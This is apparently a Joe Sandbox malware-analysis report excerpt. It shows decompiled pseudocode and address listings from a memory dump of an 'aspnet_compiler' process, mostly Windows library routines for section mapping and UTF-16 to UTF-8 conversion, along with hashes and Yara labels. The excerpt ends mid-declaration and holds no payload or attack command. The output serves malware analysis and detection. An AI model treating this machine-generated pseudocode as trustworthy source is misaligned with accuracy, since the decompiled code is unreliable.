                                                  0x018f6e39
                                                  0x018f6e3d
                                                  0x018f6e46
                                                  0x018f6e50
                                                  0x00000000
                                                  0x00000000
                                                  0x018f6e52
                                                  0x018f6e53
                                                  0x018f6e56
                                                  0x018f6e5d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018f6e5f
                                                  0x018f6e67
                                                  0x018f6e77
                                                  0x018f6e7f
                                                  0x018f6e80
                                                  0x018f6e88
                                                  0x018f6e90
                                                  0x018f6e9f
                                                  0x018f6ea5
                                                  0x018f6ea9
                                                  0x018f6eb1
                                                  0x018f6ebf
                                                  0x00000000
                                                  0x00000000
                                                  0x018f6ecf
                                                  0x018f6ed3
                                                  0x00000000
                                                  0x00000000
                                                  0x018f6edb
                                                  0x018f6ede
                                                  0x018f6ee1
                                                  0x018f6ee8
                                                  0x018f6eeb
                                                  0x018f6eed
                                                  0x018f6ef0
                                                  0x018f6ef4
                                                  0x018f6ef8
                                                  0x018f6efc
                                                  0x00000000
                                                  0x00000000
                                                  0x018f6f0d
                                                  0x018f6f11
                                                  0x018f6f32
                                                  0x018f6f37
                                                  0x018f6f3b
                                                  0x018f6f3e
                                                  0x018f6f41
                                                  0x018f6f46
                                                  0x00000000
                                                  0x00000000
                                                  0x018f6f4c
                                                  0x018f6f50
                                                  0x018f6f50
                                                  0x018f6f54
                                                  0x018f6f62
                                                  0x018f6f65
                                                  0x018f6f6d
                                                  0x018f6f7b
                                                  0x018f6f7b
                                                  0x018f6f93
                                                  0x018f6f98
                                                  0x018f6fa0
                                                  0x018f6fa6
                                                  0x018f6fb3
                                                  0x018f6fb6
                                                  0x018f6fbf
                                                  0x018f6fc1
                                                  0x018f6fd5
                                                  0x018f6fda
                                                  0x018f6fda
                                                  0x018f6fdd
                                                  0x018f6fe2
                                                  0x018f6fe7
                                                  0x018f6feb
                                                  0x018f6fef
                                                  0x018f6ff3
                                                  0x018b520c
                                                  0x018b520c
                                                  0x018b520f
                                                  0x018b5215
                                                  0x018b5234
                                                  0x018b523a
                                                  0x018b523a
                                                  0x018b5244
                                                  0x018b5245
                                                  0x018b5246
                                                  0x018b5251
                                                  0x018b5251
                                                  0x018f6f13
                                                  0x018f6f17
                                                  0x018f6f17
                                                  0x018f6f18
                                                  0x018f6f1b
                                                  0x018f6f1f
                                                  0x018f6f23
                                                  0x00000000
                                                  0x018f6f28
                                                  0x018b5204
                                                  0x018b5204
                                                  0x018b5208
                                                  0x00000000
                                                  0x018b5208
                                                  0x018b5185
                                                  0x018b5188
                                                  0x018b518a
                                                  0x018b518e
                                                  0x018b5195
                                                  0x018f6db1
                                                  0x018f6db5
                                                  0x018f6db9
                                                  0x018b519b
                                                  0x018b519b
                                                  0x018b519e
                                                  0x018b51a7
                                                  0x018b51a9
                                                  0x018b51a9
                                                  0x018b51b5
                                                  0x018b51b8
                                                  0x018b51bb
                                                  0x018b51be
                                                  0x018b51c1
                                                  0x018b51c5
                                                  0x018b51c9
                                                  0x018b51cd
                                                  0x018b51cd
                                                  0x018b51d8
                                                  0x018b51dc
                                                  0x018b51e0
                                                  0x018f6dcc
                                                  0x018f6dd0
                                                  0x018f6dd5
                                                  0x018f6ddd
                                                  0x018f6de1
                                                  0x018f6de1
                                                  0x018f6de5
                                                  0x018f6deb
                                                  0x018f6df1
                                                  0x018f6df7
                                                  0x018f6dfd
                                                  0x018f6e01
                                                  0x018f6e05
                                                  0x018f6e09
                                                  0x018f6e0d
                                                  0x018f6e11
                                                  0x018f6e11
                                                  0x018b51eb
                                                  0x018f6e1a
                                                  0x018f6e1f
                                                  0x018f6e21
                                                  0x018f6e23
                                                  0x00000000
                                                  0x018b51f1
                                                  0x018b51f1
                                                  0x00000000
                                                  0x018b51f1

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3480a7b7254354cdca1740f5cab9251a8777f9e81cb43677478e1e9275be8cc5
                                                  • Instruction ID: f4d24eb4130c4f8ef4927afbc26ca4dfc89bfb5f672c65c43dfd3efeba15156f
                                                  • Opcode Fuzzy Hash: 3480a7b7254354cdca1740f5cab9251a8777f9e81cb43677478e1e9275be8cc5
                                                  • Instruction Fuzzy Hash: B4C101755093818FD354CF28C580A5AFBE1BF88308F284A6EF999CB352D771EA45CB42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018B03E2 Relevance: .3, Instructions: 254COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E018B03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x197d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E018B0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return L018CB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0189B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1977c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(L018A7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = L018A7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01907016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E018C9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E019069A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1977c04 != 0) {
						_t118 = _v12;
						_t120 = L0190A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1977bd8;
						if( *0x1977bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E018C95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E018C99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = L01903540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0188B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E018CAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1978474 - 3;
										if( *0x1978474 != 3) {
											 *0x19779dc =  *0x19779dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(L018A7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = L018A7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01907016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1978708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1977b00; // 0x0
							asm("ror esi, cl");
							 *0x197b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E018C95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = L01897F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                  0x018b03f1
                                                  0x018b03f7
                                                  0x018b03f9
                                                  0x018b03fb
                                                  0x018b03fd
                                                  0x018b0400
                                                  0x018b040a
                                                  0x018f4c7a
                                                  0x018b0537
                                                  0x018b0547
                                                  0x018b0410
                                                  0x018b0410
                                                  0x018b0414
                                                  0x018b0417
                                                  0x018b041a
                                                  0x018b0421
                                                  0x018b0424
                                                  0x018b042b
                                                  0x018b043b
                                                  0x018b043e
                                                  0x018b043f
                                                  0x018b043f
                                                  0x018b0446
                                                  0x018b0449
                                                  0x018b044c
                                                  0x018b044f
                                                  0x018b0459
                                                  0x018f4c8d
                                                  0x018b045f
                                                  0x018b045f
                                                  0x018b045f
                                                  0x018b0467
                                                  0x018f4c97
                                                  0x018f4c9d
                                                  0x018f4ca4
                                                  0x018f4caa
                                                  0x018f4caf
                                                  0x018f4cb1
                                                  0x018f4cc3
                                                  0x018f4cb3
                                                  0x018f4cbc
                                                  0x018f4cbc
                                                  0x018f4cc8
                                                  0x018f4ccb
                                                  0x018f4cd7
                                                  0x018f4cda
                                                  0x018f4cdf
                                                  0x018f4cdf
                                                  0x018f4ccb
                                                  0x018f4ca4
                                                  0x018b046d
                                                  0x018b046f
                                                  0x018b046f
                                                  0x018b0471
                                                  0x018b0476
                                                  0x018b047a
                                                  0x018b047b
                                                  0x018b0483
                                                  0x018b0489
                                                  0x018b048d
                                                  0x00000000
                                                  0x00000000
                                                  0x018f4ce9
                                                  0x018f4cef
                                                  0x018f4d22
                                                  0x018f4d22
                                                  0x00000000
                                                  0x018f4d22
                                                  0x018f4cf1
                                                  0x018f4cf7
                                                  0x00000000
                                                  0x00000000
                                                  0x018f4cf9
                                                  0x018f4cff
                                                  0x00000000
                                                  0x00000000
                                                  0x018f4d05
                                                  0x018f4d07
                                                  0x00000000
                                                  0x00000000
                                                  0x018f4d0d
                                                  0x018f4d0f
                                                  0x018f4d14
                                                  0x018f4d16
                                                  0x00000000
                                                  0x00000000
                                                  0x018f4d1c
                                                  0x018f4d1c
                                                  0x018b0499
                                                  0x018b0535
                                                  0x018b0535
                                                  0x00000000
                                                  0x018b0535
                                                  0x018b04a6
                                                  0x018f4d2c
                                                  0x018f4d37
                                                  0x018f4d39
                                                  0x018f4d3b
                                                  0x00000000
                                                  0x00000000
                                                  0x018f4d41
                                                  0x018f4d48
                                                  0x018b0527
                                                  0x018b052b
                                                  0x018b052d
                                                  0x018b0530
                                                  0x018b0530
                                                  0x00000000
                                                  0x018b052b
                                                  0x018f4d4e
                                                  0x018b04ac
                                                  0x018b04ac
                                                  0x018b04af
                                                  0x018b04b2
                                                  0x018b04b7
                                                  0x018b04b9
                                                  0x018b04bb
                                                  0x018b04bd
                                                  0x018b04bf
                                                  0x018b04c5
                                                  0x018b04c9
                                                  0x018f4d53
                                                  0x018f4d59
                                                  0x018f4db9
                                                  0x018f4dba
                                                  0x018f4dbf
                                                  0x018f4dc2
                                                  0x018f4dc4
                                                  0x018f4dc7
                                                  0x018f4dce
                                                  0x00000000
                                                  0x018f4dce
                                                  0x018f4d5b
                                                  0x018f4d61
                                                  0x00000000
                                                  0x00000000
                                                  0x018f4d63
                                                  0x018f4d69
                                                  0x00000000
                                                  0x00000000
                                                  0x018f4d6b
                                                  0x018f4d6e
                                                  0x018f4d74
                                                  0x018f4d76
                                                  0x018f4d7c
                                                  0x018f4d7e
                                                  0x018f4d84
                                                  0x018f4d89
                                                  0x018f4d8c
                                                  0x018f4d8d
                                                  0x018f4d92
                                                  0x018f4d95
                                                  0x018f4d96
                                                  0x018f4d98
                                                  0x018f4d9a
                                                  0x018f4d9f
                                                  0x018f4da4
                                                  0x018f4da6
                                                  0x018f4da8
                                                  0x018f4daf
                                                  0x018f4db1
                                                  0x018f4db1
                                                  0x018f4daf
                                                  0x018f4da6
                                                  0x018f4d84
                                                  0x018f4d7c
                                                  0x00000000
                                                  0x018f4d74
                                                  0x018b04d6
                                                  0x018f4de1
                                                  0x018b04dc
                                                  0x018b04dc
                                                  0x018b04dc
                                                  0x018b04e4
                                                  0x018f4deb
                                                  0x018f4df1
                                                  0x018f4df8
                                                  0x018f4dfe
                                                  0x018f4e03
                                                  0x018f4e05
                                                  0x018f4e17
                                                  0x018f4e07
                                                  0x018f4e10
                                                  0x018f4e10
                                                  0x018f4e1c
                                                  0x018f4e1f
                                                  0x018f4e35
                                                  0x018f4e35
                                                  0x018f4e1f
                                                  0x018f4df8
                                                  0x018b04f1
                                                  0x018b04fa
                                                  0x018f4e3f
                                                  0x018f4e47
                                                  0x018f4e5b
                                                  0x018f4e61
                                                  0x018f4e67
                                                  0x018f4e69
                                                  0x018f4e71
                                                  0x018f4e73
                                                  0x018b0500
                                                  0x018b0500
                                                  0x018b0500
                                                  0x018b04fa
                                                  0x018b0508
                                                  0x018b051d
                                                  0x018b051d
                                                  0x018b051f
                                                  0x018b0524
                                                  0x00000000
                                                  0x018b0524
                                                  0x018b0515
                                                  0x018b0517
                                                  0x018f4e7a
                                                  0x018f4e7c
                                                  0x00000000
                                                  0x00000000
                                                  0x018f4e85
                                                  0x00000000
                                                  0x018f4e85
                                                  0x00000000
                                                  0x018b0517

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9bcf54828601093043512af027ec5d8b9e9c70f47e7d00788422d08052aad974
                                                  • Instruction ID: 73f6687171cbb8721dfbfcd9bb7b33f7573f0362fbdf9c7235af985313d8afca
                                                  • Opcode Fuzzy Hash: 9bcf54828601093043512af027ec5d8b9e9c70f47e7d00788422d08052aad974
                                                  • Instruction Fuzzy Hash: B791F931E042599FEB229A6CC884BAF7BB4AF41728F050266FA11EB3D1D7749F40C781
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018BEBB0 Relevance: .2, Instructions: 250COMMONLIBRARYCODECrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E018BEBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = E018BED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
										_t22 = _t63 - 5; // -5
										_t117 =  &(_t98[_t22]);
										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}































                                                  0x018bebb8
                                                  0x018bebbf
                                                  0x018bebc1
                                                  0x018bebc6
                                                  0x00000000
                                                  0x018fb6d6
                                                  0x018bebcd
                                                  0x018bebd2
                                                  0x018bec95
                                                  0x018fb6e0
                                                  0x018bec9b
                                                  0x018beca1
                                                  0x018beca1
                                                  0x018bec89
                                                  0x00000000
                                                  0x018bec89
                                                  0x018bebd8
                                                  0x018bebdd
                                                  0x018fb6ea
                                                  0x00000000
                                                  0x018bebe3
                                                  0x018bebe5
                                                  0x018bebe7
                                                  0x018bebef
                                                  0x018bebf2
                                                  0x00000000
                                                  0x018bebf5
                                                  0x00000000
                                                  0x018bebf5
                                                  0x018bebf5
                                                  0x018bebf7
                                                  0x018fb6f6
                                                  0x018bec7c
                                                  0x018bec7c
                                                  0x018bec7f
                                                  0x018bec82
                                                  0x018bec87
                                                  0x00000000
                                                  0x018bec87
                                                  0x018bec1a
                                                  0x018bec1a
                                                  0x018bec25
                                                  0x018fb725
                                                  0x018fb72c
                                                  0x018fb72c
                                                  0x018bec2d
                                                  0x018bec31
                                                  0x018fb73c
                                                  0x018fb744
                                                  0x018fb748
                                                  0x018fb748
                                                  0x018fb749
                                                  0x018fb749
                                                  0x018fb74a
                                                  0x018fb74a
                                                  0x018bec3e
                                                  0x018fb860
                                                  0x00000000
                                                  0x018bec44
                                                  0x018bec47
                                                  0x018fb750
                                                  0x018fb758
                                                  0x018fb767
                                                  0x018fb775
                                                  0x018fb77c
                                                  0x018fb77f
                                                  0x018fb769
                                                  0x018fb76c
                                                  0x018fb76c
                                                  0x018fb781
                                                  0x018fb788
                                                  0x018fb78b
                                                  0x018fb75a
                                                  0x018fb75d
                                                  0x018fb75d
                                                  0x018fb78d
                                                  0x018fb792
                                                  0x018fb793
                                                  0x018fb793
                                                  0x018bec54
                                                  0x018bec56
                                                  0x018bec57
                                                  0x018bec59
                                                  0x018bec5e
                                                  0x018becaa
                                                  0x018bed16
                                                  0x018bed16
                                                  0x018becac
                                                  0x018becaf
                                                  0x018becb4
                                                  0x018becb6
                                                  0x018becb6
                                                  0x018becb9
                                                  0x018becbf
                                                  0x018fb7c1
                                                  0x018fb7c8
                                                  0x018fb7d3
                                                  0x018fb7db
                                                  0x018fb7ec
                                                  0x018fb858
                                                  0x00000000
                                                  0x018fb858
                                                  0x018fb7ee
                                                  0x018fb7f1
                                                  0x018fb7f4
                                                  0x018fb7ff
                                                  0x018fb850
                                                  0x00000000
                                                  0x018fb850
                                                  0x018fb80a
                                                  0x018fb813
                                                  0x018fb81c
                                                  0x018fb81d
                                                  0x018fb822
                                                  0x018fb825
                                                  0x018fb828
                                                  0x018fb831
                                                  0x018fb832
                                                  0x018fb837
                                                  0x018fb840
                                                  0x018fb842
                                                  0x018fb845
                                                  0x018fb848
                                                  0x00000000
                                                  0x018fb848
                                                  0x018fb7df
                                                  0x00000000
                                                  0x018fb7df
                                                  0x018fb7cc
                                                  0x00000000
                                                  0x018fb7cc
                                                  0x018becc5
                                                  0x018becc7
                                                  0x018beccb
                                                  0x018fb79b
                                                  0x018fb79e
                                                  0x018fb7a4
                                                  0x00000000
                                                  0x00000000
                                                  0x018fb7a6
                                                  0x018fb7a8
                                                  0x018fb7a8
                                                  0x018becd3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018becd5
                                                  0x018becd5
                                                  0x018becd5
                                                  0x018becd8
                                                  0x018becda
                                                  0x018bece4
                                                  0x00000000
                                                  0x00000000
                                                  0x018becea
                                                  0x018beced
                                                  0x018becf0
                                                  0x018becf2
                                                  0x018becfb
                                                  0x018becfe
                                                  0x018bed01
                                                  0x018bed06
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018bed06
                                                  0x018fb7ae
                                                  0x018fb7b1
                                                  0x018fb7b7
                                                  0x00000000
                                                  0x00000000
                                                  0x018fb7b9
                                                  0x018fb7bb
                                                  0x018bed08
                                                  0x018bed08
                                                  0x018bed0c
                                                  0x018bed0c
                                                  0x00000000
                                                  0x018bec60
                                                  0x018bec62
                                                  0x018bed0f
                                                  0x018bed0f
                                                  0x00000000
                                                  0x018bed0f
                                                  0x018bec68
                                                  0x018bec6c
                                                  0x018bec6f
                                                  0x018bec75
                                                  0x018bec0d
                                                  0x018bec0d
                                                  0x018bec18
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018bec18
                                                  0x018bec77
                                                  0x018bec79
                                                  0x018bec79
                                                  0x00000000
                                                  0x018bec68
                                                  0x018bec5e
                                                  0x018bec3e
                                                  0x018bebfd
                                                  0x018bec02
                                                  0x018fb701
                                                  0x018fb70c
                                                  0x018fb71b
                                                  0x018fb71d
                                                  0x018fb71d
                                                  0x00000000
                                                  0x018fb70c
                                                  0x018bec08
                                                  0x018bec0a
                                                  0x00000000
                                                  0x018bec0a
                                                  0x018bebf5
                                                  0x018bebf5

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                                  • Instruction ID: d6163e2a8dbe287af22b0288ddd4ecb468aa661a6a55407f5c5396932a5d44b9
                                                  • Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                                  • Instruction Fuzzy Hash: B0814921A1425A8FEB214E6CC8D12FEBB51EF52314F2C467EDA42CB342C264DF46D792
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018AAB40 Relevance: .2, Instructions: 240COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 91%
                                                  			E018AAB40(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				signed short _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr* _v28;
				intOrPtr _t69;
				intOrPtr* _t70;
				intOrPtr _t71;
				intOrPtr _t73;
				void* _t74;
				signed int _t77;
				signed int _t79;
				signed int _t82;
				signed int _t88;
				unsigned int _t97;
